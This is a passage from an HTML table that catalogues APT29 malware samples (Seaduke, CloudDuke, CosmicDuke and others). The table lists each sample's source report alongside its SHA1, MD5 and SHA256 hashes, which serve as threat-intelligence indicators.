<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D7F7AEF824265136AD077AE4F874D265AE45A6B0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3195110045f64a3c83fc3e043c46d253</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F19873B6D0DB1D2DDE9134D69F5E2D5F6B939AA7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">719cf63a3922953ceaca6fb4dbed6584</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a544aa392c1f519aebdb2a7b6dc23290082b7f7103c7e3022af35dfd6bc10dde</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_Palo_Alto_Unit 42 Technical Analysis Seaduke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_Palo_Alto_Unit 42 Technical Analysis Seaduke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">BB71254FBD41855E8E70F05231CE77FEE6F00388_LogonUI.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a25ec7749b2de12c2a86167afa88a4dd</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3eb86b7b067c296ef53e4857a74e09f12c2b84b666fc130d1f58aec18bc74b0d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_Symantec_Seaduke latest weapon in the Duke armory</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-08_Prevenity Stealing data from public institutions</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-08_Prevenity Stealing data from public institutions</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F1F1ACE3906080CEF52CA4948185B665D1D7B13E_RD RCB 11.06.docx_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">84137c8e7509a0e9cf7ff71ba060cdb5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e745fc57f816b2b507406ce1c0ec47f8f84d8f5efeaf327c657723c897522c83</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-09_FSecure_THE DUKES7 years of Russian cyberespionage</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-09_FSecure_THE DUKES7 years of Russian cyberespionage</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">04299C0B549D4A46154E0A754DDA2BC9E43DFF76</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bfd2d6bf8e99332157a0fe46a4a91c52</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">10B31A17449705BE20890DDD8AD97A2FEB093674</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3a04a5d7ed785daa16f4ebfd3acf0867</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2E27C59F0CF0DBF81466CC63D87D421B33843E87</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">964e4b516d72b7717aabb71ad7cc7bf6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2F53BFCD2016D506674D0A05852318F9E8188EE1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">07660a9b83b7fbc7ab372a911c69a85b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e1490d6e5ce4c2cddef0815c55bf8946cb830ce0ac7f586cf1ae16ef66f1bd8b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">317BDE14307D8777D613280546F47DD0CE54F95B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a4f3e00b3da3e9d9382840dfbdbef311</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">44403A3E51E337C1372B0BECDAB74313125452C7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e00bf9b8261410744c10ae3fe2ce9049</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">47F26990D063C947DEBBDE0E10BD267FB0F32719</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">42ffc84c6381a18b1f6d000b94c74b09</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c1ee4232d1b6504fc7f93cb0478e90049a71992498ed2d701925d852e91cfcc3</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4800D67EA326E6D037198ABD3D95F4ED59449313</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8473fae7fdae7ee5a8b0fb64ebb596c1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">52D44E936388B77A0AFDB21B099CF83ED6CBAA6F</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">72512c49401bd3d04a8ef6c7a6475307</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0f7d64f514e99a2abdc10dc85e7e6f57c210a0f35472f7b897a19b73be36bece</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6A3C2AD9919AD09EF6CDFFC80940286814A0AA2C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">50bf9c6de53b7de6906c2d5ed6177c28</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7B8851F98F765038F275489C69A485E1BED4F82D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a9c045c401afb9766e2ca838dc6f47a4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d3d503934c0dfe75e386d0fb8da2e32238d93739624b6c5a929fe5b722b35d36</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">84BA6B6A0A3999C0932F35298948F149EE05BC02</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">70f5574e4e7ad360f4f5c2117a7a1ca7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">910DFE45905B63C12C6F93193F5DC08F5B012BC3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9018fa0826f237342471895f315dbf39</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9F5B46EE0591D3F942CCAA9C950A8BFF94AA7A0F</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">97886672cc570ba4a5d6a162e92d0155</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">85c5ba695992ed59269ea7f7a58f3453f6047729d1f68a444d450439bbccc1f4</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">BFE26837DA22F21451F0416AA9D241F98FF1C0F8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">837b522730ff896435682b36f7b27a3e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">12f58639a883b0fcfe3d2e8bcb0330b978731975c9dfa2f8e583adbafc4d534e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C16529DBC2987BE3AC628B9B413106E5749999ED</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e163d9a91f97f133b0e3f2bbe4dc226a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d4d79be85dc98f74088d6393a8fdf2b5d947ae4f279909af2aed0221dcecfe94</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CC15924D37E36060FAA405E5FA8F6CA15A3CACE2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b0a9a175e2407352214b2d005253bc0c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6c8eb3365b7fb7683b9b465817e5cb87574026e306c700f3d103eba056777720</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D7F7AEF824265136AD077AE4F874D265AE45A6B0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3195110045f64a3c83fc3e043c46d253</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">DEA6E89E36CF5A4A216E324983CC0B8F6C58EAA8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4d3a94134aaf590ae8ece0a57257e129</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">80cb4007b9756246404c260bc69abf5d4938a1cc217d40ecbfdd6171b02b9e24</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ED0CF362C0A9DE96CE49C841AA55997B4777B326</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">856b224da7525ea5192efbef7a9b8112</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bfc1bafd9b01178037226fa55546d7ed7e9203c13e1b66419e887fee704d5196</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F54F4E46F5F933A96650CA5123A4C41E115A9F61</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ffb407dc2b20357302a4550a73f6c342</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ecd0ce1973500c27bb5d70f326d115fba84c0b1680a726a041ed57b42063e7b1</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F97C5E8D018207B1D546501FE2036ADFBF774CFD</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b8690064dc61333c591252c4204fbbb3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c3ea57eea9f522cfc70ef8c3b614f7e44903293a2e8354359b99efbf4cd436df</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CloudDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">FE33B9F95DB53C0096AE9FB9672F9C7C32D22ACF</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4f148ffeac50df60f9f9015b909d8ed0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6c7e768e48b9b225b7b9f84528c53c2e6f9b639ce2e7919fe0dff9aad07ea4f5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-09_FSecure_THE DUKES7 years of Russian cyberespionage</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">01E5080B832C6E4FCB7B9D06CAFFE03DAB8D95DA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a4008cf300fd22f470c38489da9e25cf</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">aecb468db5cebcfa25deadeb3b12fbc48b05a485b44deb500b4002521bc3e685</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">02F55947402689EC755356AB6B0345A592446DA7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cb8624999aa959b873e9bdb60ee65c0f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">187b1cc7264c04c3158f835546cad0be74e6411bb50cb8899179a71018f0b4b9</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">03C5690728B7DFFB2F4AB947FE390264751428AA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3a2ba475bf6a60dbe3ed59330c53c3f7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">246543cc4a538472bed0626c159715a963e39dfc69d79f60c3ab227c62277016</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0653A8F06B140F4FAC44ACB3BE723D7BB2602558</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5dabff44971cc53bef7d8e17e85dda73</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7c14761d20617ab7f408d6c63367f16026377d7c13f3e3c67525e034fc0c6d7c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0BC8485CE6C24BB888E2329D479C9B7303BB98B4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8988f29396515f47de0457f9daa1dd62</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dad4c4aea24f2bd3e2f4b93bf782ebef70e8fdf930aff25a3e1b85a717314aa0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0C8DB6542172DE98FA16C9BACFEF9ED4099FD872</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">91a50a90cb31fad48908d5c6294e92ba</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ccd3c69710977360459c0d2539d5e7e7defce097bcfee3ae62e564de7c938f17</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0D8F41FE09DBD75AB953F9E64A6CDBBBC198BF2B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0ee0f7fd55843d1ef7c9d6396bbcb99b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a8200a476f72ef77f4cd6bd71ebae9f473e923b140600b9da0bbaf1f22e1cecb</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0E5F55676E01D8E41D77CDC43489DA8381B68086</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dc6cc442c0900104a5601a6049354fad</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">41d63d293a6e2722fcf82f8bf67b8f566bd4d3f669ede146ccc286f0228d8f62</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0FF7CE34841C03C876B141C1F46D0FF2519889CC</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fa52383868abf82d027b971e799a599a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a31551902d2cbb7110a9f5f04bfba7269410850155dc6163c7bf8cad171ed68c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">11B5CFB37EFB45D2C721CBF20CAB7C1F5C1AA44B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">51a96f279e790d2f861bb0ff843a7328</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">620da58f80640661ccec202a3b20f138b8a0c9f374fb1fb5525dd3fe00ac5a8c</span></td></tr>
